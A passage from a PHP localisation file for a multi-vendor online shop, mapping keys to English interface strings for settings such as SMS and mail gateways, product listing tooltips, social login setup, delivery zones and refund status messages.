=> 'Want to turn ON twilio sms', 'want_to_turn_OFF_twilio_sms' => 'Want to turn OFF twilio sms', 'want_to_turn_ON_nexmo_sms' => 'Want to turn ON nexmo sms', 'want_to_turn_OFF_nexmo_sms' => 'Want to turn OFF nexmo sms', 'want_to_turn_ON_twofactor_sms' => 'Want to turn ON twofactor sms', 'want_to_turn_OFF_twofactor_sms' => 'Want to turn OFF twofactor sms', 'want_to_turn_ON_msg91_sms' => 'Want to turn ON msg91 sms', 'want_to_turn_OFF_msg91_sms' => 'Want to turn OFF msg91 sms', 'SMS_gateway_title' => 'SMS gateway title', 'SMS_Gateway_Title' => 'SMS Gateway Title', '_as_the_SMS_Gateway' => ' as the SMS Gateway', 'if_enabled_system_can_use_this_SMS_Gateway' => 'If enabled system can use this SMS Gateway', 'if_disabled_system_cannot_use_this_SMS_Gateway' => 'If disabled system cannot use this SMS Gateway', 'upload_max_filesize' => 'Upload max filesize', 'post_max_size' => 'Post max size', 'The_file_upload_field_is_required' => 'The file upload field is required', 'first_name_is_required' => 'First name is required', 'email_already_has_been_taken' => 'Email already has been taken', 'phone_number_already_has_been_taken' => 'Phone number already has been taken', 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product' => 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product', 'customer_Information' => 'Customer Information', 'edit_Customer' => 'Edit Customer', 'tag' => 'Tag', 'Customer_review' => 'Customer review', 'OFF' => 'OFF', 'now' => 'Now', 'add_fund_to_wallet' => 'Add fund to wallet', 'and_enjoy' => 'And enjoy', 'bonus' => 'Bonus', 'all_Transactions' => 'All Transactions', 'please_select_a_payment_Methods' => 'Please select a payment Methods', 'if_enabled_sellers_can_sell_digital_products_in_their_shops' => 'If enabled sellers can sell digital products in their shops', 'if_disabled_sellers_can_not_sell_digital_products_in_their_shops' => 'If disabled sellers can not sell digital products in their shops', 'minimum_amount_can_not_be_greater_than_maximum_amount' => 'Minimum amount can not be greater than maximum amount', 'Tech Shop' => 'Tech Shop', 'Gil Watkins' => 'Gil Watkins', 'qwert' => 'Qwert', 'bank_information' => 'Bank information', 'file_not_found' => 'File not found', 'No_country_to_deliver' => 'No country to deliver', 'business_setup' => 'Business setup', 't_id' => 'T id', 'Account _number' => 'Account number', 'account_holder_name' => 'Account holder name', 'qwertyu' => 'Qwertyu', 'Theme Changed to Theme Aster' => 'Theme Changed to Theme Aster', 'Theme Changed to Theme Fashion' => 'Theme Changed to Theme Fashion', 'product asdfghjkl ' => 'Product asdfghjkl ', 'all_brands_page' => 'All brands page', 'search_brand' => 'Search brand', 'update_to_cart' => 'Update to cart', 'cart_updated' => 'Cart updated', 'item_details' => 'Item details', 'item_discount' => 'Item discount', 'tax_incl.' => 'Tax incl.', 'deliveryman_can_not_assign_or_change_in_that_status' => 'Deliveryman can not assign or change in that status', 'items_Price' => 'Items Price', 'THANK_YOU' => 'THANK YOU', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products_by_admin._For_“Ready_After_Sale”_deliveries _customers_pay_first _then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'For “Ready Product” deliveries customers can pay & instantly download pre-uploaded digital products by admin. For “Ready After Sale” deliveries customers pay first then admin uploads the digital products that become available to customers for download', 'upload_the_digital_products_from_here' => 'Upload the digital products from here', 'create_a_unique_product_code_by_clicking_on_the_“Generate_Code”_button' => 'Create a unique product code by clicking on the “Generate Code” button', 'add_the_purchase_price_for_this_product' => 'Add the purchase price for this product', 'set_the_selling_price_for_each_unit_of_this_product._This_Unit_Price_section_won’t_be_applied_if_you_set_a_variation_wise_price' => 'Set the selling price for each unit of this product. This Unit Price section won’t be applied if you set a variation wise price', 'set_the_minimum_order_quantity_that_customers_must_choose._Otherwise _the_checkout_process_won’t_start' => 'Set the minimum order quantity that customers must choose. Otherwise the checkout process won’t start', 'add_the_Stock_Quantity_of_this_product_that_will_be_visible_to_customers' => 'Add the Stock Quantity of this product that will be visible to customers', 'if_“Flat” _discount_amount_will_be_set_as_fixed_amount._If_“Percentage” _discount_amount_will_be_set_as_percentage.' => 'If “Flat” discount amount will be set as fixed amount. If “Percentage” discount amount will be set as percentage.', 'add_the_discount_amount_in_percentage_or_a_fixed_value_here' => 'Add the discount amount in percentage or a fixed value here', 'set_the_Tax_Amount_in_percentage_here' => 'Set the Tax Amount in percentage here', 'if_enabled _the_shipping_charge_will_increase_with_the_product_quantity' => 'If enabled the shipping charge will increase with the product quantity', 'add_your_product’s_thumbnail_in' => 'Add your product’s thumbnail in', 'format_within' => 'Format within', 'upload_any_additional_images_for_this_product_from_here' => 'Upload any additional images for this product from here', 'add_color-wise_product_images_here' => 'Add color-wise product images here', 'add_the_YouTube_video_link_here._Only_the_YouTube-embedded_link_is_supported' => 'Add the YouTube video link here. Only the YouTube-embedded link is supported', 'add_Meta_Image_in' => 'Add Meta Image in', 'which_will_be_shown_in_search_engine_results' => 'Which will be shown in search engine results', 'this_shop_currently_close_now' => 'This shop currently close now', 'seller_pos_permission_updated.' => 'Seller pos permission updated.', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products_by_seller._For_“Ready_After_Sale”_deliveries _customers_pay_first _then_seller_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'For “Ready Product” deliveries customers can pay & instantly download pre-uploaded digital products by seller. For “Ready After Sale” deliveries customers pay first then seller uploads the digital products that become available to customers for download', 'update_&_Publish' => 'Update & Publish', 'customer Name' => 'Customer Name', 'must_upload_colour_wise_images_first._Colour_is_shown_in_the_image_section_top_right' => 'Must upload colour wise images first. Colour is shown in the image section top right', 'delivery_fee' => 'Delivery fee', 'add_more_for_free_delivery' => 'Add more for free delivery', 'Choose_Logo' => 'Choose Logo', 'turn' => 'Turn', 'important' => 'Important', 'reCAPTCHA_is_now_enabled_for_added_security.Users_may_be_prompted_to_complete_a_reCAPTCHA_challenge_to_verify_their_human_identity_and protect_against_spam_and_malicious_activity' => 'ReCAPTCHA is now enabled for added security.Users may be prompted to complete a reCAPTCHA challenge to verify their human identity and protect against spam and malicious activity', 'add_a_label_(Ex:_abc_company)' => 'Add a label (Ex: abc company)', 'want_to_change_the_shipping_responsibility_to_Seller_Wise' => 'Want to change the shipping responsibility to Seller Wise', 'want_to_change_the_shipping_responsibility_to_Inhouse' => 'Want to change the shipping responsibility to Inhouse', 'admin_will_handle_the_shipping_responsibilities_when_you_choose_inhouse_shipping_method' => 'Admin will handle the shipping responsibilities when you choose inhouse shipping method', 'Want_to_change_the_shipping_responsibility_to_Inhouse' => 'Want to change the shipping responsibility to Inhouse', 'sellers_will_handle_the_shipping_responsibilities_when_you_choose_seller_wise_shipping_method' => 'Sellers will handle the shipping responsibilities when you choose seller wise shipping method', 'please_make_sure_all_the product`s_delivery_charges_are_up_to_date.' => 'Please make sure all the product`s delivery charges are up to date.', 'category_wise_shipping_cost' => 'Category wise shipping cost', 'ticket_closed_successfully.' => 'Ticket closed successfully.', 'deleted!' => 'Deleted!', 'cancelled' => 'Cancelled', 'you_do_not_have_sufficient_balance_for_pay_this_order!!' => 'You do not have sufficient balance for pay this order!!', 'Deluxe Online Deluxe' => 'Deluxe Online Deluxe', 'deliveryman_review' => 'Deliveryman review', 'order wise shipping cost' => 'Order wise shipping cost', 'admin_Earning_Report' => 'Admin Earning Report', 'in_House_earning' => 'In House earning', 'earning_From_Shipping' => 'Earning From Shipping', 'total_Tax' => 'Total Tax', 'filter_order' => 'Filter order', 'order_type' => 'Order type', 'date_type' => 'Date type', 'order_Transaction_Statement' => 'Order Transaction Statement', 'delivered_By' => 'Delivered By', 'total_Product_Amount' => 'Total Product Amount', 'discounted_Amount' => 'Discounted Amount', 'delivery_Charge' => 'Delivery Charge', 'order_Amount' => 'Order Amount', 'profile_Settings' => 'Profile Settings', 'nav_menu' => 'Nav menu', 'basic_Information' => 'Basic Information', 'full_name' => 'Full name', 'display_name' => 'Display name', 'your_first_name' => 'Your first name', 'enter_new_email_address' => 'Enter new email address', 'profile_Image' => 'Profile Image', 'image_Upload' => 'Image Upload', 'change_your_password' => 'Change your password', 'enter_new_password' => 'Enter new password', 'confirm_your_new_password' => 'Confirm your new password', 'Delivery_unavailable_for_this_zip_code_area' => 'Delivery unavailable for this zip code area', 'update_successful' => 'Update successful', 'sslcommerz' => 'Sslcommerz', 'want_to_Turn_ON_the_smtp_mail_configt_option' => 'Want to Turn ON the smtp mail configt option', 'want_to_Turn_OFF_the_smtp_mail_config_option' => 'Want to Turn OFF the smtp mail config option', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails.Please_ensure_that_you_have_correctly_configured_the_SMTP_settings_to_avoid_potential_issues_with_email_delivery' => 'Enabling mail configuration services will allow the system to send emails.Please ensure that you have correctly configured the SMTP settings to avoid potential issues with email delivery', 'disabling_SMTP_mail_configuration_services_stops_email_sending' => 'Disabling SMTP mail configuration services stops email sending', 'want_to_Turn_ON_the_sendgrid_mail_configt_option' => 'Want to Turn ON the sendgrid mail configt option', 'want_to_Turn_OFF_the_sendgrid_mail_config_option' => 'Want to Turn OFF the sendgrid mail config option', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails.Please_ensure_that_you_have_correctly_configured_the_sendgrid_settings_to_avoid_potential_issues_with_email_delivery' => 'Enabling mail configuration services will allow the system to send emails.Please ensure that you have correctly configured the sendgrid settings to avoid potential issues with email delivery', 'disabling_sendgrid_mail_configuration_services_stops_email_sending' => 'Disabling sendgrid mail configuration services stops email sending', 'Deluxe Online Deluxe Online' => 'Deluxe Online Deluxe Online', 'No_Order_Found' => 'No Order Found', 'Want_to_Turn_ON_Coupon_Status' => 'Want to Turn ON Coupon Status', 'Want_to_Turn_OFF_Coupon_Status' => 'Want to Turn OFF Coupon Status', 'if_enabled_this_coupon_will_be_available_on_the_website_and_customer_app' => 'If enabled this coupon will be available on the website and customer app', 'if_disabled_this_coupon_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this coupon will be hidden from the website and customer app', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products._For_“Ready_After_Sale”_deliveries _customers_pay_first _then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'For “Ready Product” deliveries customers can pay & instantly download pre-uploaded digital products. For “Ready After Sale” deliveries customers pay first then admin uploads the digital products that become available to customers for download', 'add_the_product_search_tag_for_this_product_that_customers_can_use_to_search_quickly' => 'Add the product search tag for this product that customers can use to search quickly', 'pricing_&_others' => 'Pricing & others', 'set_the_tax_calculation_method_from_here._Select_“Include_with_product”_to_combine_product_price_and_tax_on_the_checkout._Pick_“Exclude_from_product”_to_display_product_price_and_tax_amount_separately.' => 'Set the tax calculation method from here. Select “Include with product” to combine product price and tax on the checkout. Pick “Exclude from product” to display product price and tax amount separately.', 'set_the_shipping_cost_for_this_product_here._Shipping_cost_will_only_be_applicable_if_product-wise_shipping_is_enabled.' => 'Set the shipping cost for this product here. Shipping cost will only be applicable if product-wise shipping is enabled.', 'Want_to_Add' => 'Want to Add', 'to_the_featured_section' => 'To the featured section', 'Want_to_Remove' => 'Want to Remove', 'if_enabled_this_product_will_be_shown_in_the_featured_product_on_the_website_and_customer_app' => 'If enabled this product will be shown in the featured product on the website and customer app', 'if_disabled_this_product_will_be_removed_from_the_featured_product_section_of_the_website_and_customer_app' => 'If disabled this product will be removed from the featured product section of the website and customer app', 'Want_to_Turn_ON' => 'Want to Turn ON', 'Want_to_Turn_OFF' => 'Want to Turn OFF', 'if_enabled_this_product_will_be_available_on_the_website_and_customer_app' => 'If enabled this product will be available on the website and customer app', 'if_disabled_this_product_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this product will be hidden from the website and customer app', 'London Beauty Soap Bar' => 'London Beauty Soap Bar', 'all_store' => 'All store', 'no_country_to_deliver' => 'No country to deliver', 'Want_to_Turn_ON_Offline_Payment_Methods' => 'Want to Turn ON Offline Payment Methods', 'Want_to_Turn_OFF_Offline_Payment_Methods' => 'Want to Turn OFF Offline Payment Methods', 'if_enabled_customers_can_pay_through_different_payment_methods_outside_your_system' => 'If enabled customers can pay through different payment methods outside your system', 'if_disabled_customers_can_only_pay_through_the_system_supported_payment_methods' => 'If disabled customers can only pay through the system supported payment methods', 'if_Customer_Referral_Earning_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'If Customer Referral Earning is disabled above all settings of this section will be unavailable', 'set_the_earning_amount_for_each_successful_referral' => 'Set the earning amount for each successful referral', 'if_enabled_admin_can_deliver_orders_outside_his_country' => 'If enabled admin can deliver orders outside his country', 'want_to_Turn_ON_Delivery_Available_Country' => 'Want to Turn ON Delivery Available Country', 'want_to_Turn_OFF_Delivery_Available_Country' => 'Want to Turn OFF Delivery Available Country', 'If_enabled_admin_can_deliver_orders_beyond_his_country' => 'If enabled admin can deliver orders beyond his country', 'If_disabled_admin_can_deliver_orders_only_within_his_country' => 'If disabled admin can deliver orders only within his country', 'if_enabled_deliveries_will_be_available_only_in_the_added_zip_code_areas' => 'If enabled deliveries will be available only in the added zip code areas', 'want_to_Turn_ON_Delivery_Available_Zip_Code_Area' => 'Want to Turn ON Delivery Available Zip Code Area', 'want_to_Turn_OFF_Delivery_Available_Zip_Code_Area' => 'Want to Turn OFF Delivery Available Zip Code Area', 'if_disabled_there_will_be_no_delivery_restrictions_based_on_zip_code_areas' => 'If disabled there will be no delivery restrictions based on zip code areas', 'no_country_found' => 'No country found', 'no_zip_code_found' => 'No zip code found', 'please_enter_zip_code' => 'Please enter zip code', 'new product' => 'New product', 'test product minus value' => 'Test product minus value', 'copy_the_latitude_of_your_business_location_from_Google_Maps_and_paste_it_here' => 'Copy the latitude of your business location from Google Maps and paste it here', 'copy_the_longitude_of_your_business_location_from_Google_Maps_and_paste_it_here' => 'Copy the longitude of your business location from Google Maps and paste it here', 'Theme Changed to Default' => 'Theme Changed to Default', 'urway' => 'Urway', 'order_verification_images' => 'Order verification images', 'name_not_found' => 'Name not found', 'phone_not_found' => 'Phone not found', 'type something!' => 'Type something!', 'order_Info' => 'Order Info', 'offline_payments_info' => 'Offline payments info', 'view_order_details' => 'View order details', 'minimum_order_quantity_cannot_be_less_than' => 'Minimum order quantity cannot be less than', 'banner_Setup' => 'Banner Setup', 'banner_image_ratio_is_not_same_for_all_sections_in_website' => 'Banner image ratio is not same for all sections in website', 'please_review_the_ratio_before_upload' => 'Please review the ratio before upload', 'banner_Image_ratio_is_not_same_for_all_sections_in_website' => 'Banner Image ratio is not same for all sections in website', 'if_enabled_this_banner_will_be_available_on_the_website_and_customer_app' => 'If enabled this banner will be available on the website and customer app', 'if_disabled_this_banner_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this banner will be hidden from the website and customer app', 'Promo Banner Right' => 'Promo Banner Right', 'Promo Banner Middle Bottom' => 'Promo Banner Middle Bottom', 'Promo Banner Middle Top' => 'Promo Banner Middle Top', 'Promo Banner Left' => 'Promo Banner Left', 'all_Pages_Banner ' => 'All Pages Banner ', 'Banner Privacy Policy' => 'Banner Privacy Policy', 'banner privacy policy' => 'Banner privacy policy', 'Banner Refund Policy' => 'Banner Refund Policy', 'banner refund policy' => 'Banner refund policy', 'Banner Return Policy' => 'Banner Return Policy', 'banner return policy' => 'Banner return policy', 'banner cancellation policy' => 'Banner cancellation policy', 'Banner Product List Page' => 'Banner Product List Page', 'banner product list page' => 'Banner product list page', 'banner terms conditions' => 'Banner terms conditions', 'Banner Faq Page' => 'Banner Faq Page', 'banner faq page' => 'Banner faq page', 'Banner About Us' => 'Banner About Us', 'banner about us' => 'Banner about us', 'please_fill_out_this_field' => 'Please fill out this field', 'want_to_inactive_this' => 'Want to inactive this', 'are_you_sure_you_want_to_delete_the' => 'Are you sure you want to delete the', 'you_will_lost_the_this' => 'You will lost the this', 'want_to_activate_this' => 'Want to activate this', 'OTP_&_login_settings' => 'OTP & login settings', 'maximum_OTP_hit' => 'Maximum OTP hit', 'set_how_many_times_a_user_can_hit_the_wrong_OTPs.' => 'Set how many times a user can hit the wrong OTPs.', 'after_reaching_this_limit_the_user_will_be_blocked_for_a_time' => 'After reaching this limit the user will be blocked for a time', 'OTP_resend_time_' => 'OTP resend time ', '(sec)' => '(sec)', 'set_the_time_for_requesting_a_new_OTP' => 'Set the time for requesting a new OTP', 'ex: 30 ' => 'Ex: 30 ', 'Within_this_time_users_can_not_make_OTP_requests_again' => 'Within this time users can not make OTP requests again', 'ex: 120' => 'Ex: 120', 'set_the_maximum_unsuccessful_login_attempts_users_can_make_using_wrong_passwords.' => 'Set the maximum unsuccessful login attempts users can make using wrong passwords.', 'after_reaching_this_limit_they_will_be_blocked_for_a_time' => 'After reaching this limit they will be blocked for a time', 'set_a_time_duration_during_which_users_cannot_log_in_after_reaching_the_Maximum_Login_Hit_limit' => 'Set a time duration during which users cannot log in after reaching the Maximum Login Hit limit', 'ex: 1210' => 'Ex: 1210', 'want_to_turn_ON_google_login' => 'Want to turn ON google login', 'want_to_turn_OFF_google_login' => 'Want to turn OFF google login', 'if_enabled_customers_can_log_in_to_their_account_using_their google credentials' => 'If enabled customers can log in to their account using their google credentials', 'if_disabled_customers_cannot_log_in_to_their_account_using_their google credentials' => 'If disabled customers cannot log in to their account using their google credentials', 'add_the_OAuth_authorization_URL' => 'Add the OAuth authorization URL', 'add_the_unique_client_ID ' => 'Add the unique client ID ', 'client_secret_key' => 'Client secret key', 'want_to_turn_ON_facebook_login' => 'Want to turn ON facebook login', 'want_to_turn_OFF_facebook_login' => 'Want to turn OFF facebook login', 'if_enabled_customers_can_log_in_to_their_account_using_their facebook credentials' => 'If enabled customers can log in to their account using their facebook credentials', 'if_disabled_customers_cannot_log_in_to_their_account_using_their facebook credentials' => 'If disabled customers cannot log in to their account using their facebook credentials', 'want_to_turn_ON_apple_login' => 'Want to turn ON apple login', 'want_to_turn_OFF_apple_login' => 'Want to turn OFF apple login', 'if_enabled_customers_can_log_in_to_their_account_using_their_Apple_credentials' => 'If enabled customers can log in to their account using their Apple credentials', 'if_disabled_customers_cannot_log_in_to_their_account_using_their_Apple_credentials' => 'If disabled customers cannot log in to their account using their Apple credentials', 'add_the_unique_client_ID' => 'Add the unique client ID', 'add_key_id' => 'Add key id', 'key_ID' => 'Key ID', 'go_to_the_Google_Developers_Console' => 'Go to the Google Developers Console', 'create_a_new_project_or_select_an_existing_project' => 'Create a new project or select an existing project', 'click_on_ Credentials _in_the_left-hand_menu' => 'Click on Credentials in the left-hand menu', 'create_an_OAuth_client_ID_for_a_web_application' => 'Create an OAuth client ID for a web application', 'enter_a_name_for_your_client ID_and_click_ Create ' => 'Enter a name for your client ID and click Create ', 'enter_the_URL_of_your_website_as_an_authorized_JavaScript_origin' => 'Enter the URL of your website as an authorized JavaScript origin', 'enter_the_callback_URL_as_an_authorized_redirect_URL' => 'Enter the callback URL as an authorized redirect URL', 'copy_and_paste_the_client_ID_and_client_secret_into_your_application`s_settings' => 'Copy and paste the client ID and client secret into your application`s settings', 'enable_the_Google_login_option_in_your_application`s_settings_and_thoroughly_test_the_integration_before_deploying_it_to_a_live_environment' => 'Enable the Google login option in your application`s settings and thoroughly test the integration before deploying it to a live environment', 'go_to_the_Facebook_Developer_website' => 'Go to the Facebook Developer website', 'create_a_new_app_or_select_an_existing_app' => 'Create a new app or select an existing app', 'click_on_ Add_a_New_App _or_select_an_existing_app_from_the_dashboard' => 'Click on Add a New App or select an existing app from the dashboard', 'fill_in_the_required_details _such_as_Display_Name _Contact_Email _and_App_Purpose' => 'Fill in the required details such as Display Name Contact Email and App Purpose', 'click_ Create_App _to_create_your_app' => 'Click Create App to create your app', 'in_the_left-hand_menu _click_on Settings _and_then_ Basic _to access_your_app`s_basic_settings' => 'In the left-hand menu click on Settings and then Basic to access your app`s basic settings', 'scroll_down_to_the_ Facebook_Login _section_and_click_on_ Set_Up _to_configure_your_Facebook_login_settings' => 'Scroll down to the Facebook Login section and click on Set Up to configure your Facebook login settings', 'choose_the_login_behavior _permissions _and_other_settings_as_per_your_requirements' => 'Choose the login behavior permissions and other settings as per your requirements', 'copy_and_paste_the_App_ID_and_App_Secret_into_your_application`s_settings' => 'Copy and paste the App ID and App Secret into your application`s settings', 'enable_the_Facebook_login_option_in_your_application`s_settings_and_thoroughly_test_the_integration_before_deploying_it_to_a_live_environment' => 'Enable the Facebook login option in your application`s settings and thoroughly test the integration before deploying it to a live environment', 'apple_API_Set_up_Instructions' => 'Apple API Set up Instructions', 'order_Note' => 'Order Note', 'product_ID_is_required' => 'Product ID is required', 'cart_key_or_ID_is_required' => 'Cart key or ID is required', 'order_not_found' => 'Order not found', 'invalid_coupon' => 'Invalid coupon', 'Delivery_man_added_successfully' => 'Delivery man added successfully', 'Want_to_Turn_ON_Deliveryman_Status' => 'Want to Turn ON Deliveryman Status', 'Want_to_Turn_OFF_Deliveryman_Status' => 'Want to Turn OFF Deliveryman Status', 'if_enabled_this_deliveryman_can_log_in_to_the_system_and_deliver_products' => 'If enabled this deliveryman can log in to the system and deliver products', 'if_disabled_this_deliveryman_cannot_log_in_to_the_system_and_deliver_any_products' => 'If disabled this deliveryman cannot log in to the system and deliver any products', 'want_to_remove_this_information ' => 'Want to remove this information ', 'finish' => 'Finish', 'identity_type' => 'Identity type', 'driving_license' => 'Driving license', 'company_id' => 'Company id', 'identity_number' => 'Identity number', 'add_deliveryman' => 'Add deliveryman', 'no_delivery_man_found' => 'No delivery man found', 'multiply_with_quantity' => 'Multiply with quantity', 'This_phone_number_is_already_taken' => 'This phone number is already taken', 'Coupon_deleted_successfully' => 'Coupon deleted successfully', 'Want_to_Unlock' => 'Want to Unlock', 'Want_to_Block' => 'Want to Block', 'if_enabled_this_customer_will_be_unblocked_and_can_log_in_to_this_system_again' => 'If enabled this customer will be unblocked and can log in to this system again', 'if_disabled_this_customer_will_be_blocked_and_cannot_log_in_to_this_system' => 'If disabled this customer will be blocked and cannot log in to this system', 'the_minimum_purchase_amount_must_be_greater_than_discount_amount' => 'The minimum purchase amount must be greater than discount amount', 'total_sold_amount' => 'Total sold amount', 'additional_Information' => 'Additional Information', 'filter_Products' => 'Filter Products', 'product_SKU' => 'Product SKU', 'attribute_Variation' => 'Attribute Variation', 'variation_Wise_Price' => 'Variation Wise Price', 'Variation_Wise_Stock' => 'Variation Wise Stock', 'Upload_Image' => 'Upload Image', 'you_can`t_delete_account_due_ongoing_product' => 'You can`t delete account due ongoing product', 'give_review' => 'Give review', 'search menu' => 'Search menu', 'category_not_found' => 'Category not found', 'Want_to_Turn_ON_Deal_of_the_Day_Status' => 'Want to Turn ON Deal of the Day Status', 'Want_to_Turn_OFF_Deal_of_the_Day_Status' => 'Want to Turn OFF Deal of the Day Status', 'if_enabled_this_deal_of_the_day_will_be_available_on_the_website_and_customer_app' => 'If enabled this deal of the day will be available on the website and customer app', 'if_disabled_this_deal_of_the_day_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this deal of the day will be hidden from the website and customer app', 'deal_Update' => 'Deal Update', 'update_Deal_of_The_Day' => 'Update Deal of The Day', 'Want_to_Turn_ON_Flash_Deal_Status' => 'Want to Turn ON Flash Deal Status', 'Want_to_Turn_OFF_Flash_Deal_Status' => 'Want to Turn OFF Flash Deal Status', 'if_enabled_this_flash_sale_will_be_available_on_the_website_and_customer_app' => 'If enabled this flash sale will be available on the website and customer app', 'if_disabled_this_flash_sale_will_be_hidden_from_the_user_website_and_customer_app' => 'If disabled this flash sale will be hidden from the user website and customer app', 'contact_View' => 'Contact View', 'message_view' => 'Message view', 'user_details' => 'User details', 'feedback' => 'Feedback', 'please_send_a_Feedback' => 'Please send a Feedback', 'not_Seen_Yet' => 'Not Seen Yet', 'message_Log' => 'Message Log', 'foyixyitd' => 'Foyixyitd', 'no_reply' => 'No reply', 'send_Mail' => 'Send Mail', 'configure_your_mail_setup_first' => 'Configure your mail setup first', 'mail_Body' => 'Mail Body', 'new_Request' => 'New Request', 'POS_Order' => 'POS Order', 'add_meta_titles_descriptions_and_images_for_products' => 'Add meta titles descriptions and images for products', 'this_will_help_more_people_to_find_them_on_search_engines_and_see_the_right_details_while_sharing_on_other_social_platforms' => 'This will help more people to find them on search engines and see the right details while sharing on other social platforms', 'add_the_products_title_name_taglines_etc_here' => 'Add the products title name taglines etc here', 'this_title_will_be_seen_on_Search_Engine_Results_Pages_and_while_sharing_the_products_link_on_social_platforms' => 'This title will be seen on Search Engine Results Pages and while sharing the products link on social platforms', 'character_Limit' => 'Character Limit', 'write_a_short_description_of_the_InHouse_shops_product' => 'Write a short description of the InHouse shops product', 'this_description_will_be_seen_on_Search_Engine_Results_Pages_and_while_sharing_the_products_link_on_social_platforms' => 'This description will be seen on Search Engine Results Pages and while sharing the products link on social platforms', 'Notification_Sent_to_All_Sellers_Fail' => 'Notification Sent to All Sellers Fail', 'Notification_Sent_to_All_Sellers' => 'Notification Sent to All Sellers', 'Amazon Pro' => 'Amazon Pro', 'Want_to_enable_the_Temporary_Close' => 'Want to enable the Temporary Close', 'Want_to_disable_the_Temporary_Close' => 'Want to disable the Temporary Close', 'if_enabled_your_shop_and_products_will_be_temporarily_closed' => 'If enabled your shop and products will be temporarily closed', 'if_disabled_your_shop_and_products_will_be_active' => 'If disabled your shop and products will be active', 'set_the_minimum_order_amount_a_customer_must_order_from_this_seller_shop' => 'Set the minimum order amount a customer must order from this seller shop', 'OTP_sent_successfully._Please_check_your_email_or_phone' => 'OTP sent successfully. Please check your email or phone', 'Deliveryman_Password_Reset_Mail' => 'Deliveryman Password Reset Mail', 'OTP for Reset Password' => 'OTP for Reset Password', 'user_not_found' => 'User not found', 'want_to_Turn_ON_This_Withdraw_Method' => 'Want to Turn ON This Withdraw Method', 'want_to_Turn_OFF_This_Withdraw_Method' => 'Want to Turn OFF This Withdraw Method', 'if_you_enable_this_Withdraw_method_will_be_shown_in_the_seller_app_and_seller_panel' => 'If you enable this Withdraw method will be shown in the seller app and seller panel', 'if_you_disable_this_Withdraw_method_will_not_be_shown_in_the_seller_app_and_seller_panel' => 'If you disable this Withdraw method will not be shown in the seller app and seller panel', 'if_you_enable_this_Withdraw_method_will_be_set_as_Default_Withdraw_Method_in_the_seller_app_and_seller_panel' => 'If you enable this Withdraw method will be set as Default Withdraw Method in the seller app and seller panel', 'if_you_disable_this_Withdraw_method_will_be_remove_as_Default_Withdraw_Method_in_the_seller_app_and_seller_panel' => 'If you disable this Withdraw method will be remove as Default Withdraw Method in the seller app and seller panel', 'Seller_POS_Permission' => 'Seller POS Permission', 'if_enabled_this_seller_can_access_POS_from_the_website_and_seller_app' => 'If enabled this seller can access POS from the website and seller app', 'want_to_Turn_ON_POS_For_This_Seller' => 'Want to Turn ON POS For This Seller', 'want_to_Turn_OFF_POS_For_This_Seller' => 'Want to Turn OFF POS For This Seller', 'if_disabled_this_seller_can_access_POS_from_the_website_and_seller_app' => 'If disabled this seller can access POS from the website and seller app', 'want_to_Turn_ON_Sales_Commission_For_This_Seller' => 'Want to Turn ON Sales Commission For This Seller', 'want_to_Turn_OFF_Sales_Commission_For_This_Seller' => 'Want to Turn OFF Sales Commission For This Seller', 'if_sales_commission_is_enabled_here_the_this_commission_will_be_applied' => 'If sales commission is enabled here the this commission will be applied', 'want_to_Turn_ON_GST_Number_For_This_Seller' => 'Want to Turn ON GST Number For This Seller', 'want_to_Turn_OFF_GST_Number_For_This_Seller' => 'Want to Turn OFF GST Number For This Seller', 'if_GST_number_is_enabled_here_it_will_be_show_in_invoice' => 'If GST number is enabled here it will be show in invoice', 'commission_percentage_for_this_seller_has_been_updated.' => 'Commission percentage for this seller has been updated.', 'GST_number_for_this_seller_has_been_updated.' => 'GST number for this seller has been updated.', 'Secure_Payment' => 'Secure Payment', 'see_less' => 'See less', 'Customers_will_not_be_able_to_select_COD_as_a_payment_method_during_checkout' => 'Customers will not be able to select COD as a payment method during checkout', 'please_review_your_settings_and_enable_COD_if_you_wish_to_offer_this_payment_option_to_customers' => 'Please review your settings and enable COD if you wish to offer this payment option to customers', 'dont_miss_todays_deal' => 'Dont miss todays deal', 'shop_unfollow' => 'Shop unfollow', 'Features_Section' => 'Features Section', 'view_All_Hold_Orders' => 'View All Hold Orders', 'add_New_Customer' => 'Add New Customer', 'clear_Cart' => 'Clear Cart', 'new_Order' => 'New Order', 'announcement_Setup' => 'Announcement Setup', 'Want_to_Turn_ON_Language_Status' => 'Want to Turn ON Language Status', 'Want_to_Turn_OFF_Language_Status' => 'Want to Turn OFF Language Status', 'if_enabled_this_language_will_be_available_throughout_the_entire_system' => 'If enabled this language will be available throughout the entire system', 'if_disabled_this_language_will_be_hidden_from_the_entire_system' => 'If disabled this language will be hidden from the entire system', 'Want_to_Change_Default_Language_Status' => 'Want to Change Default Language Status', 'if_enabled_this_language_will_be_set_as_default_for_the_entire_system' => 'If enabled this language will be set as default for the entire system', 'if_disabled_this_language_will_be_unset_as_default_for_the_entire_system' => 'If disabled this language will be unset as default for the entire system', 'default_language_can_not_be_deactive' => 'Default language can not be deactive', 'Showing' => 'Showing', 'Of' => 'Of', 'Entries' => 'Entries', 'Filtered' => 'Filtered', 'Total_entries' => 'Total entries', 'No_data_found' => 'No data found', 'No_matching_data_found' => 'No matching data found', 'inhouse_Requests' => 'Inhouse Requests', 'seller_Requests' => 'Seller Requests', 'after_refunded_you_can_not_change_it' => 'After refunded you can not change it', 'you_want_to_change_refund_status' => 'You want to change refund status', 'refund_status_updated_successfully' => 'Refund status updated successfully', 'it_is_already_refunded_you_can_not_change_it' => 'It is already refunded you can not change it', 'website_Order' => 'Website Order', 'out city' => 'Out city', 'terms_&_Conditions' => 'Terms & Conditions', 'privacy_Policy' => 'Privacy Policy', 'refund_Policy' => 'Refund Policy', 'return_Policy' => 'Return Policy', 'cancellation_Policy' => 